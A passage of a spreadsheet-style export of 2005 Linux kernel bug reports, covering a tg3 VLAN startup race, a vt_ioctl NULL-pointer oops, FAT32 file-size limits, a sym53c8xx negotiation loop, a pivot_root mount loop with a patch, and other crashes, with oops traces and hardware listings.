    <t>Distribution: debian sarge Hardware Environment: # cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 5 model name : AMD Opteron(tm) Processor 242 stepping : 10 cpu MHz : 1595.465 cache size : 1024 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr ss e sse2 syscall nx mmxext lm 3dnowext 3dnow bogomips : 3137.53 processor : 1 vendor_id : AuthenticAMD cpu family : 15 model : 5 model name : AMD Opteron(tm) Processor 242 stepping : 10 cpu MHz : 1595.465 cache size : 1024 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr ss e sse2 syscall nx mmxext lm 3dnowext 3dnow bogomips : 3186.68 # lspci 0000:00:06.0 PCI bridge: Advanced Micro Devices [AMD] AMD-8111 PCI (rev 07) 0000:00:07.0 ISA bridge: Advanced Micro Devices [AMD] AMD-8111 LPC (rev 05) 0000:00:07.1 IDE interface: Advanced Micro Devices [AMD] AMD-8111 IDE (rev 03) 0000:00:07.3 Bridge: Advanced Micro Devices [AMD] AMD-8111 ACPI (rev 05) 0000:00:0a.0 PCI bridge: Advanced Micro Devices [AMD] AMD-8131 PCI-X Bridge (rev 12) 0000:00:0a.1 PIC: Advanced Micro Devices [AMD] AMD-8131 PCI-X APIC (rev 01) 0000:00:0b.0 PCI bridge: Advanced Micro Devices [AMD] AMD-8131 PCI-X Bridge (rev 12) 0000:00:0b.1 PIC: Advanced Micro Devices [AMD] AMD-8131 PCI-X APIC (rev 01) 0000:00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 0000:00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 0000:00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 0000:00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 0000:00:19.0 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 0000:00:19.1 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 0000:00:19.2 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 0000:00:19.3 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 0000:01:00.0 USB Controller: Advanced Micro Devices [AMD] AMD-8111 USB (rev 0b) 0000:01:00.1 USB Controller: Advanced Micro Devices [AMD] AMD-8111 USB (rev 0b) 0000:01:05.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27) 0000:02:01.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5704 Gigabit Ethernet (rev 03) 0000:02:01.1 Ethernet controller: Broadcom Corporation NetXtreme BCM5704 Gigabit Ethernet (rev 03) 0000:02:02.0 SCSI storage controller: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI (rev 07) 0000:03:03.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Software Environment: kernel 2.6.11 - 2.6.12.1 Problem Description: The problem was seen for the first time after upgrading kernel from 2.6.11.6 to 2.6.12. When debian setup all interfaces using it's /etc/init.d/networking script according to /etc/network/interfaces. When an ethernet device is set up and then in really short time vlans are configured - they become completely death. When I use "ip li set down dev ethX.vlanID" and then immediately "ip li set up dev ethX.vlanID" everything starts working correctly. If I remove all vlans, shut the interface and rmmod driver and then again modprobe it: - I can configure device and add vlan slowly by hand - everything works - do it by classic debian script - It again does not work - do it by script with "sleep 5" inserted after configuring ethX device, it again works When I tried all kernels from 2.6.11.6 to 2.6.12.1, this begins to happen in kernel 2.6.12-rc4 (rc3 is ok) Another important thing is, that this happens on "Broadcom Corporation NetXtreme BCM5704 Gigabit Ethernet" (tg3 module). With this NIC I've made all tests. But problem was first saw on e1000 (but I have no chance to test all kernels and everything with that :( ) I've also tried classic realtec 8139too NIC, but there IS NOT this problem. (Is that gbit NIC cards related?) Everytime drivers were used as modules. I've tried: - disable SMP support - reverse patch of tg3 driver (rc3 kernel version inserted rc4 kernel) If you have any suggestion or if you need another informations - ask as you wish ;)</t>
  </si>
  <si>
    <t>Kernel Oops in vt_ioctl()</t>
  </si>
  <si>
    <t>2005-06-28 10:26 UTC</t>
  </si>
  <si>
    <t>Petr Tesarik</t>
  </si>
  <si>
    <t>2005-08-31 01:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge (*not* a Debian-patched kernel) Hardware Environment: K6/200MHz Software Environment: mingetty 1.07 Problem Description: The kernel oopses during mingetty start-up on virtual console #3. Here is the Oops: Oops: 0000 [#180] PREEMPT Modules linked in: CPU: 0 EIP: 0060:[vt_ioctl+30/6848] Not tainted VLI EFLAGS: 00010282 (2.6.10) EIP is at vt_ioctl+0x1e/0x1ac0 eax: 00000000 ebx: 00005401 ecx: 00000000 edx: c1198c00 esi: fffffff8 edi: c580e000 ebp: c5b21ce0 esp: c3085ec4 ds: 007b es: 007b ss: 0068 Process mingetty (pid: 2183, threadinfo=c3084000 task=c32bda20) Stack: c5b20dc0 c1373660 b7f785e0 00000000 c594fde0 c5494b7c c5b20dc0 c5b20dec c1373660 c32bda20 c010a86f c5b20dc0 c1373660 b7f785e0 00000000 00000000 b7f785e0 00000004 c3085fc4 c3085fc4 c02b397c 00000004 0000000e 0000000b Call Trace: [do_page_fault+847/1349] do_page_fault+0x34f/0x545 [dentry_open+259/544] dentry_open+0x103/0x220 [filp_open+70/96] filp_open+0x46/0x60 [tty_ioctl+857/1184] tty_ioctl+0x359/0x4a0 [sys_ioctl+146/480] sys_ioctl+0x92/0x1e0 [syscall_call+7/11] syscall_call+0x7/0xb Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 55 57 56 53 81 ec 94 00 00 00 8b bc 24 a8 00 00 00 8b 9c 24 b0 00 00 00 8b 87 7c 09 00 00 &lt;8b&gt; 30 8b 04 b5 a0 02 36 c0 89 44 24 2c 56 e8 0f 65 00 00 85 c0 I have traced the problem down to the source code (drivers/char/vt_ioctl.c:365): int vt_ioctl(struct tty_struct *tty, struct file * file, unsigned int cmd, unsigned long arg) { struct vt_struct *vt = (struct vt_struct *)tty-&gt;driver_data; struct vc_data *vc = vc_cons[vt-&gt;vc_num].d; struct console_font_op op; /* used in multiple places here */ struct kbd_struct * kbd; unsigned int console; unsigned char ucval; void __user *up = (void __user *)arg; int i, perm; The vc_data variable cannot be initialized, since vt (i.e. tty-&gt;driver_data) is NULL at that moment. :( Writing to the console proves this diagnostics: root@metuzalem:~# echo &gt; /dev/tty3 vt: argh, driver_data is NULL ! Steps to reproduce: Not easily reproducible and most likely a race condition. :(((( I have been using this kernel for quite some time and it only happened today. The kernel is currently running on my computer, but I'll have to shut it down eventually... :( Although driver_data should be never NULL (AFAIK), this seems to be a known issue. See drivers/char/vt.c:1921: acquire_console_sem(); vt = tty-&gt;driver_data; if (vt == NULL) { printk(KERN_ERR "vt: argh, driver_data is NULL !\n"); release_console_sem(); return 0; } If driver_data *is* allowed to be NULL, the problem is still present in 2.6.12, see drivers/char/vt_ioctl.c: 359 int vt_ioctl(struct tty_struct *tty, struct file * file, 360 unsigned int cmd, unsigned long arg) 361 { 362 struct vc_data *vc = (struct vc_data *)tty-&gt;driver_data; 363 struct console_font_op op; /* used in multiple places here */ 364 struct kbd_struct * kbd; 365 unsigned int console; 366 unsigned char ucval; 367 void __user *up = (void __user *)arg; 368 int i, perm; 369 370 console = vc-&gt;vc_num; At this point, the kernel would oops.</t>
  </si>
  <si>
    <t>SMBus  for i801 is inaccesible due to broken BIOS</t>
  </si>
  <si>
    <t>2005-06-28 21:50 UTC</t>
  </si>
  <si>
    <t>2005-06-29 08:14 UTC</t>
  </si>
  <si>
    <t>Machine will not boot when using 2.6.12.2</t>
  </si>
  <si>
    <t>2.6.12.2</t>
  </si>
  <si>
    <t>2005-06-30 09:30 UTC</t>
  </si>
  <si>
    <t>John Doe</t>
  </si>
  <si>
    <t>2005-07-22 10:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux (With kernel.org vanilla kernel ) Hardware Environment: Athlon XP-M 2100+ HP Pavilion Ze4400 Software Environment: Gentoo Linux Problem Description: When booting my machine it hangs after finding the ALI Chipset, but before it finds the hard drive hda. Steps to reproduce: Reboot Machine with 2.6.12.2 (2.6.12.1 boots fine)</t>
  </si>
  <si>
    <t>4 GB file size on FAT32</t>
  </si>
  <si>
    <t>2005-06-30 09:56 UTC</t>
  </si>
  <si>
    <t>William M. Quarles</t>
  </si>
  <si>
    <t>2008-03-09 07:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core Hardware Environment: Dell Dimension XPS T series Software Environment: Fedora Core 2 Problem Description: Everything that I have read says that FAT32 has a maximum file size of 2GB under Linux. But Windows XP at least supports 4GB files on FAT32 partitions. I know this because I have created some of them. When I boot into Fedora Core the filesystem check, the check fails on that file and reduces the file size from 4GB to zero. This does not fit into my definition of compatibility, even if different OSes have different file size limits. There should be some option to turn on 4GB file size support Steps to reproduce: 1. Make a 4 GB file on a FAT 32 in an OS that supports it. 2. Run a filesystem check on that partition under Linux. 3. Watch the check fail.</t>
  </si>
  <si>
    <t>acpi_power-battery</t>
  </si>
  <si>
    <t>Problem with sym53c8xx_2 and target devices that doesn't support SYNC/PPR</t>
  </si>
  <si>
    <t>2005-07-01 15:18 UTC</t>
  </si>
  <si>
    <t>2005-12-15 04:07 UTC</t>
  </si>
  <si>
    <t>I've encountered a problem when using the sym53c8xx_2 driver with a scsi target device that doesn't support synchronous transfer (sync), nor PPR: In response to an inquiry command, my scsi device will return inquiry data where the SYNC bit (of byte 7) is cleared. Thus, the "sdtr" flag (in struct scsi_device) will never be set (see drivers/scsi/scsi_scan.c: scsi_add_lun()). The "sdtr" flag is later on checked by the spi_support_sync() function, in sym_check_goals() (see sym53c8xx_2/sym_hipd.c). This is where the root of the problem is, I think: As the target device doesn't support sync, the sym_check_goals() function will clear all fields within the sym_trans structure (including goal-&gt;period). As a result, the sym_prepare_nego() function (also in sym_hipd.c) will try to use PPR (parallel protocol request) for negotiation (as goal-&gt;period &lt; 0). Now, my target device doesn't support PPR (extended message 0x04) either. So it will reject this message. Thus we will end up in sym_nego_default() (also in sym_hipd.c). The sym_nego_default() function will basically set tp-&gt;tgoal.check_nego = 1, thus restarting the negotiation (with the comment that "A target that understands a PPR message should never reject it..."). But - a target that *doesn't* understand PPR will reject it, and in that case it doesn't make sense to just restart negotiation. It will eventually end up in sym_prepare_nego() again, and as the target still doesn't understand SYNC, it will go for PPR again. And again. And again. The result being that my target device receives an endless sequence of PPR messages. So, to summarize: In the current implementation, the sym_prepare_nego() function will always go for PPR, as soon as the SYNC bit is cleared (which is a bit odd). And it also looks odd to me to try PPR all over again (and again) with a target device that already has rejected it once. A target that understands PPR will of course not reject it. But a target device that *doesn't* understand it will. And if that target device doesn't support SYNC either, then we will basically end up in an endless loop of PPRs here.</t>
  </si>
  <si>
    <t>ACPI: C2 no longer detected for CPU</t>
  </si>
  <si>
    <t>2.6.13-rc1-mm1</t>
  </si>
  <si>
    <t>2005-07-02 07:26 UTC</t>
  </si>
  <si>
    <t>2005-07-12 03:23 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Athlon XP-M 2600+, EPoX 8K9A3+ (VIA KT400) Problem Description: With 2.6.13-rc1-mm1, ACPI does no longer detect C2 power state for CPU, only C1, leaving CPU running full throttle all the time. 2.6.12-mm2 still uses C2. Steps to reproduce: happens always on my machine. config attached.</t>
  </si>
  <si>
    <t>Need to be root to create files with security context.</t>
  </si>
  <si>
    <t>2005-07-03 23:35 UTC</t>
  </si>
  <si>
    <t>Ian Dall</t>
  </si>
  <si>
    <t>2005-08-03 12:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 Hardware Environment: i386 Software Environment: Problem Description: Only root can create files labelled with a security context. Steps to reproduce: Enable selinux, setenforce 0 (for convenience). On a JFS file system, as root: mkdir /mnt/jfs/foobar chcon system_u:object_r:tmp_t /mnt/jfs/foobar touch /mnt/jfs/foobar/foo ls -Z /m/mnt/jfs/foobar/foo # All well and good su &lt;user&gt; touch /mnt/jfs/foobar/bar ls -Z /m/mnt/jfs/foobar/bar # Note bar is unlabled examine syslog for messages like: post_create: setxattr failed, rc=1 (dev=dm-2 ino=188416) note that this is not a avc message and has nothing really to do with selinux, excpet that it stops selinux being useable on jfs patitions. It turns out this is due to some inverted logic in xatrr.c. Patch follows.</t>
  </si>
  <si>
    <t>Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(8,19)</t>
  </si>
  <si>
    <t>2.6.13-rc1-mm1, 2.6.12-mm2</t>
  </si>
  <si>
    <t>2005-07-04 13:17 UTC</t>
  </si>
  <si>
    <t>2005-07-12 04:18 UTC</t>
  </si>
  <si>
    <t>From: Rafael J. Wysocki &lt;rjw@sisk.pl&gt; http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=112025619711289&amp;w=2 I get this errors on a dual-Opteron box (64-bit): 3ware Storage Controller device driver for Linux v1.26.02.001. ACPI: PCI Interrupt 0000:02:08.0[A] -&gt; GSI 27 (level, low) -&gt; IRQ 18 scsi1 : 3ware Storage Controller 3w-xxxx: scsi1: Found a 3ware Storage Controller at 0x8c00, IRQ: 18. Vendor: Model: Rev: Type: Direct-Access ANSI SCSI revision: 00 ]--snip--[ sdb : sector size 0 reported, assuming 512. SCSI device sdb: 1 512-byte hdwr sectors (0 MB) sdb: asking for cache data failed sdb: assuming drive cache: write through sdb : sector size 0 reported, assuming 512. SCSI device sdb: 1 512-byte hdwr sectors (0 MB) sdb: asking for cache data failed sdb: assuming drive cache: write through sdb: sdb1 sdb2 sdb3 sdb4 &lt; &gt; Attached scsi disk sdb at scsi1, channel 0, id 0, lun 0 ]--snip--[ ReiserFS: sdb3: warning: sh-2006: read_super_block: bread failed (dev sdb3, block 16, size 512) ReiserFS: sdb3: warning: sh-2006: read_super_block: bread failed (dev sdb3, block 128, size 512) EXT3-fs: unable to read superblock EXT2-fs: unable to read superblock Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(8,19) sdb is a 3ware 8006-2LP SATA RAID. The problem is 100% reproducible.</t>
  </si>
  <si>
    <t>(wireless hermes) driver should be more specific about IPW support</t>
  </si>
  <si>
    <t>2005-07-05 05:10 UTC</t>
  </si>
  <si>
    <t>Filipus Klutiero</t>
  </si>
  <si>
    <t>2007-11-13 12:34 UTC</t>
  </si>
  <si>
    <t>Problem Description: Hermes chipset 802.11b support (Orinoco/Prism2/Symbol) (HERMES) isn't specific enough about IPW support. The first paragraph of the help is as follows : "A driver for 802.11b wireless cards based based on the "Hermes" or Intersil HFA384x (Prism 2) MAC controller. This includes the vast majority of the PCMCIA 802.11b cards (which are nearly all rebadges) - except for the Cisco/Aironet cards. Cards supported include the Apple Airport (not a PCMCIA card), WavelanIEEE/Orinoco, Cabletron/EnteraSys Roamabout, ELSA AirLancer, MELCO Buffalo, Avaya, IBM High Rate Wireless, Farralon Syyline, Samsung MagicLAN, Netgear MA401, LinkSys WPC-11, D-Link DWL-650, 3Com AirConnect, Intel PRO/Wireless, and Symbol Spectrum24 High Rate amongst others." Intel PRO/Wireless generally uses a...IPW chipset (hence ipw2100.sf.net, ipw2200.sf.net). This could confuse someone shopping for a wireless card supported in the main kernel tree into buying an IPW2100, 2200, 2915, which aren't supported, but particularly an IPW2100, since the configuration mentions "802.11b support". The actual support seems to be for IPW2011, an obsolete product using a Spectrum24 chipset according to http://www.kallisys.com/newton/morewifi/?lg=fr&amp;id=9 ). [I couldn't find a document from Intel confirming which chipset IPW2011 uses, but it's pretty obvious if you Google a bit.] BTW, another one-word fix to that help would be to scratch one "based" in the first sentence. Note that I couldn't find doc about reporting documentation bugs, so I'm sending it to Other-Configuration since it's in Kconfig.</t>
  </si>
  <si>
    <t>C1 &amp; C2 Support</t>
  </si>
  <si>
    <t>2005-07-05 11:31 UTC</t>
  </si>
  <si>
    <t>Damien Bellegueulle</t>
  </si>
  <si>
    <t>2005-07-29 12:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandriva 2005 Hardware Environment: Notebook Asus M6Ne ( Bios 2008Ae , the last ) Software Environment: Kde 3.3.2 Problem Description: active state: C1 max_cstate: C8 bus master activity: 00000000 states: &lt;not supported&gt; Steps to reproduce:</t>
  </si>
  <si>
    <t>pf: Oops with Imation SuperDisk</t>
  </si>
  <si>
    <t>2005-07-06 05:23 UTC</t>
  </si>
  <si>
    <t>2005-12-29 06:54 UTC</t>
  </si>
  <si>
    <t>From: Ondrej Zary &lt;linux@rainbow-software.org&gt; http://marc.theaimsgroup.com/?t=112039162500004&amp;r=1&amp;w=2 I've tried to use my external Imation SuperDisk parallel port drive in Linux 2.6.12 but failed. The drive is detected properly but when I try to mount a floppy, I get errors (they look like timeouts), the system is unresponsive (even framebuffer cursor stops blinking) and then it oopses (see below). Also when I configure the port to ECP/EPP in BIOS, the driver is unable to use any EPP mode (uses 8-bit and the oops is the same). sh-3.00# /sbin/modprobe paride sh-3.00# /sbin/modprobe epat paride: epat registered as protocol 0 sh-3.00# /sbin/modprobe pf verbose=1 drive0=0x378 pf: pf version 1.04, major 47, cluster 64, nice 0 pf0: 0x378 is parport0 pf0: epat: port 0x378, mode 0, ccr 0, test=(0,256,0) pf0: epat: port 0x378, mode 1, ccr 40, test=(224,256,448) pf0: epat: port 0x378, mode 2, ccr 0, test=(0,256,0) pf0: epat: port 0x378, mode 3, ccr 0, test=(0,256,0) pf0: epat: port 0x378, mode 4, ccr 0, test=(0,256,0) pf0: epat: port 0x378, mode 5, ccr 0, test=(0,256,0) pf0: Sharing parport0 at 0x378 pf0: epat 1.02, Shuttle EPAT chip c6 at 0x378, mode 5 (EPP-32), delay 1 pf0: Reset (1) signature = 1 1 1 14 eb pf0: MATSHITA LS-120 COSM 04, master LUN 0, type 0, removable, 2880 blocks sh-3.00# /sbin/mount /dev/pf0 /mnt/floppy/ -t vfat pf0: MATSHITA LS-120 COSM 04, master LUN 0, type 0, removable, 2880 blocks pf0: read block completion: alt=0x50 stat=0x50 err=0x100 loop=160001 phase=3 pf0: read block completion: alt=0x50 stat=0x50 err=0x100 loop=160001 phase=3 pf0: read block completion: alt=0x50 stat=0x50 err=0x100 loop=160001 phase=3 pf0: read block completion: alt=0x50 stat=0x50 err=0x100 loop=160001 phase=3 pf0: read block completion: alt=0x50 stat=0x50 err=0x100 loop=160001 phase=3 pf0: read block completion: alt=0x50 stat=0x50 err=0x100 loop=160001 phase=3 pf0: read block completion: alt=0x50 stat=0x50 err=0x100 loop=160001 phase=3 pf0: read block completion: alt=0x50 stat=0x50 err=0x100 loop=160001 phase=3 sh-3.00# ------------[ cut here ]------------ kernel BUG at &lt;bad filename&gt;:54507! invalid operand: 0000 [#1] PREEMPT Modules linked in: pf epat paride CPU: 0 EIP: 0060:[&lt;c0236967&gt;] Not tainted VLI EFLAGS: 00010046 (2.6.12-pentium) EIP is at end_request+0x47/0x50 eax: 00000000 ebx: c7e43a24 ecx: 00000000 edx: c7e43a24 esi: 00000246 edi: c8822c24 ebp: 00000246 esp: c7f93f34 ds: 007b es: 007b ss: 0068 Process events/0 (pid: 3, threadinfo=c7f92000 task=c7fc3020) Stack: c7f92000 c8821232 00000247 c88211b0 c88200e8 00000000 c8822c20 c7f92000 c012016a c113c818 00000000 c8820090 c7f92000 c113c808 c113c800 ffffffff ffffffff 00000001 00000000 c010eb50 00010000 00000000 c0305e0a c7f93fc4 Call Trace: [&lt;c8821232&gt;] do_pf_read_drq+0x82/0x130 [pf] [&lt;c88211b0&gt;] do_pf_read_drq+0x0/0x130 [pf] [&lt;c88200e8&gt;] ps_tq_int+0x58/0xd0 [pf] [&lt;c012016a&gt;] worker_thread+0x1ba/0x290 [&lt;c8820090&gt;] ps_tq_int+0x0/0xd0 [pf] [&lt;c010eb50&gt;] default_wake_function+0x0/0x10 [&lt;c0305e0a&gt;] schedule+0x31a/0x5f0 [&lt;c010eb50&gt;] default_wake_function+0x0/0x10 [&lt;c011ffb0&gt;] worker_thread+0x0/0x290 [&lt;c0123e74&gt;] kthread+0x94/0xa0 [&lt;c0123de0&gt;] kthread+0x0/0xa0 [&lt;c0100c1d&gt;] kernel_thread_helper+0x5/0x18 Code: da 74 28 8b 43 04 89 42 04 89 5b 04 89 10 89 1b 8b 43 54 85 c0 75 08 89 d8 5b e9 05 ff ff ff 8b 43 50 89 da e8 eb c0 ff ff eb ec &lt;0f&gt; 0b eb d4 90 8d 74 26 00 57 &lt;6&gt;note: events/0[3] exited with preempt_count 1</t>
  </si>
  <si>
    <t>kernel BUG at fs/jfs/jfs_dmap.c:2790!</t>
  </si>
  <si>
    <t>2.6.12-mm2</t>
  </si>
  <si>
    <t>2005-07-06 08:25 UTC</t>
  </si>
  <si>
    <t>2005-08-03 12:33 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES 9 w/kernel.org Linux version 2.6.12-mm2 Hardware Environment: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 2.40GHz stepping : 9 cpu MHz : 2399.754 cache size : 512 KB Software Environment: Linux version 2.6.12-mm2 Problem Description: BUG at fs/jfs/jfs_dmap.c:2790 assert(newval == leaf[buddy]) ------------[ cut here ]------------ kernel BUG at fs/jfs/jfs_dmap.c:2790! invalid operand: 0000 [#1] Modules linked in: usbserial parport_pc lp parport edd joydev sg st sd_mod sr_mod scsi_mod ide_cd cdrom nvram speedstep_lib thermal processor fan button battery ac ipv6 ohci_hcd sworks_agp agpgart i2c_piix4 i2c_core evdev usbcore nls_utf8 jfs dm_mod raid1 reiserfs CPU: 0 EIP: 0060:[&lt;f8b77725&gt;] Not tainted VLI EFLAGS: 00010282 (2.6.12-mm2) EIP is at dbJoin+0x75/0xb0 [jfs] eax: 00000042 ebx: 00000005 ecx: dd0abcec edx: f8b8ac2e esi: 00000030 edi: dbf34010 ebp: 00000001 esp: dd0abce8 ds: 007b es: 007b ss: 0068 Process rm (pid: 27558, threadinfo=dd0aa000 task=dd8fc530) Stack: f8b8ac2e f8b8ac1c 00000ae6 f8b8ad34 dbf34076 00000031 00000000 00000001 00000000 00000032 f8b77091 00008000 00000000 dbf34010 00000001 00000001 00000621 00288621 00000000 dbf34000 f6f61000 0000000c 00288621 00000000 Call Trace: [&lt;f8b77091&gt;] dbFreeBits+0x151/0x2c0 [jfs] [&lt;f8b76c65&gt;] dbFreeDmap+0x25/0x90 [jfs] [&lt;f8b74fde&gt;] dbFree+0x14e/0x260 [jfs] [&lt;f8b8603a&gt;] txFreeMap+0x15a/0x2e0 [jfs] [&lt;f8b704e4&gt;] xtTruncate+0xb34/0xdd0 [jfs] [&lt;c0118b41&gt;] __wake_up+0x11/0x20 [&lt;f8b8389e&gt;] txLockFree+0x5e/0xa0 [jfs] [&lt;f8b84da3&gt;] txCommit+0x2a3/0x2c0 [jfs] [&lt;c0118b41&gt;] __wake_up+0x11/0x20 [&lt;f8b67d90&gt;] jfs_delete_inode+0x0/0xd0 [jfs] [&lt;f8b69047&gt;] jfs_free_zero_link+0x67/0x160 [jfs] [&lt;f8b68c04&gt;] jfs_unlink+0x114/0x3d0 [jfs] [&lt;f8b67d90&gt;] jfs_delete_inode+0x0/0xd0 [jfs] [&lt;f8b67e27&gt;] jfs_delete_inode+0x97/0xd0 [jfs] [&lt;c016f08a&gt;] generic_delete_inode+0xaa/0x130 [&lt;c016f2c4&gt;] iput+0x54/0x70 [&lt;c0165c3a&gt;] sys_unlink+0xba/0x100 [&lt;c0168186&gt;] sys_getdents64+0xa6/0xb0 [&lt;c01674e1&gt;] do_fcntl+0x141/0x160 [&lt;c0102d7b&gt;] sysenter_past_esp+0x54/0x79 Code: 04 8b 14 24 31 ee 0f be 04 16 39 c3 7f 48 39 c3 74 24 68 34 ad b8 f8 68 e6 0a 00 00 68 1c ac b8 f8 68 2e ac b8 f8 e8 2b 45 5a c7 &lt;0f&gt; 0b e6 0a 1c ac b8 f8 83 c4 10 39 74 24 04 7c ae 83 c9 ff 8b Steps to reproduce: Run LTP test fsstress and SDET testcase in a loop.</t>
  </si>
  <si>
    <t>pivot_root from initramfs causes circular reference in mount tree</t>
  </si>
  <si>
    <t>2.6.12.1, 2.6.13-rc1, 2.6.13-rc1-mm1</t>
  </si>
  <si>
    <t>2005-07-06 12:04 UTC</t>
  </si>
  <si>
    <t>Richard Fish</t>
  </si>
  <si>
    <t>2005-08-20 18:43 UTC</t>
  </si>
  <si>
    <t>When pivot_root is called from an init script in an initramfs environment, it causes a circular reference in the mount tree. I was able to see this by adding some debug printk's to the detach_mnt and attach_mnt functions. When pivot_root runs, the output was: detach_mnt: mnt=d7ee3300, old_nd=d7d39ee8 detach_mnt: mnt=d7ee3780, old_nd=d7d39ea8 attach_mnt: mnt=d7ee3780, nd=d7d39f28 mnt-&gt;mnt_parent=d7ee3300 attach_mnt: mnt=d7ee3300, nd=d7d39ea8 mnt-&gt;mnt_parent=d7ee3780 Notice the mnt_parent assignments in attach_mnt. The effect of this bug can be seen when the user tries to umount the initramfs, or if mount --move is used later. In either case, the kernel gets stuck in an endless loop. The best patch I can come up with for this is below. It passes the WOMM test, and preserves the behavior when pivot_root is used from an initrd (or another filesystem below the rootfs), while fixing the problem when it is the rootfs that is being pivoted. But maybe something needs to be done with current-&gt;namespace-&gt;root as well in this case? --- linux-2.6.13-rc1/fs/namespace.c.orig 2005-07-03 20:30:18.000000000 +0200 +++ linux-2.6.13-rc1/fs/namespace.c 2005-07-03 20:31:54.000000000 +0200 @@ -1344,6 +1344,9 @@ goto out3; detach_mnt(new_nd.mnt, &amp;parent_nd); detach_mnt(user_nd.mnt, &amp;root_parent); + if (user_nd.mnt == current-&gt;namespace-&gt;root) { + root_parent.mnt = new_nd.mnt; /* avoid creating a mount loop */ + } attach_mnt(user_nd.mnt, &amp;old_nd); /* mount old root on put_old */ attach_mnt(new_nd.mnt, &amp;root_parent); /* mount new_root on / */ spin_unlock(&amp;vfsmount_lock);</t>
  </si>
  <si>
    <t>HFS+ seems to cause kernel panic on unmount</t>
  </si>
  <si>
    <t>2.6.12-1.1387_FC4smp</t>
  </si>
  <si>
    <t>2005-07-07 16:57 UTC</t>
  </si>
  <si>
    <t>Edmund Rhudy</t>
  </si>
  <si>
    <t>2005-11-18 12:04 UTC</t>
  </si>
  <si>
    <t>Distribution: -------------------------------------- Fedora Core 4 Hardware Environment: -------------------------------------- Dell Dimension 8400 (Pentium 4 3.4 GHz) ls_pci -vvv output: 00:00.0 Host bridge: Intel Corporation 925X/XE Memory Controller Hub (rev 04) Subsystem: Dell: Unknown device 0177 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [e0] Vendor Specific Information 00:01.0 PCI bridge: Intel Corporation 925X/XE PCI Express Root Port (rev 04) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size 10 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: dfd00000-dfefffff Prefetchable memory behind bridge: d0000000-d7ffffff Secondary status: 66Mhz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [88] #0d [0000] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [90] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Address: fee01004 Data: 40b9 Capabilities: [a0] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;64ns, L1 &lt;1us Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed 2.5Gb/s, Width x16, ASPM L0s, Port 2 Link: Latency L0s &lt;256ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x16 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug- Surpise- Slot: Number 7680, PowerLimit 75.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Off, PwrInd On, Power- Root: Correctable- Non-Fatal- Fatal- PME- Capabilities: [100] Virtual Channel Capabilities: [140] Unknown (5) 00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- 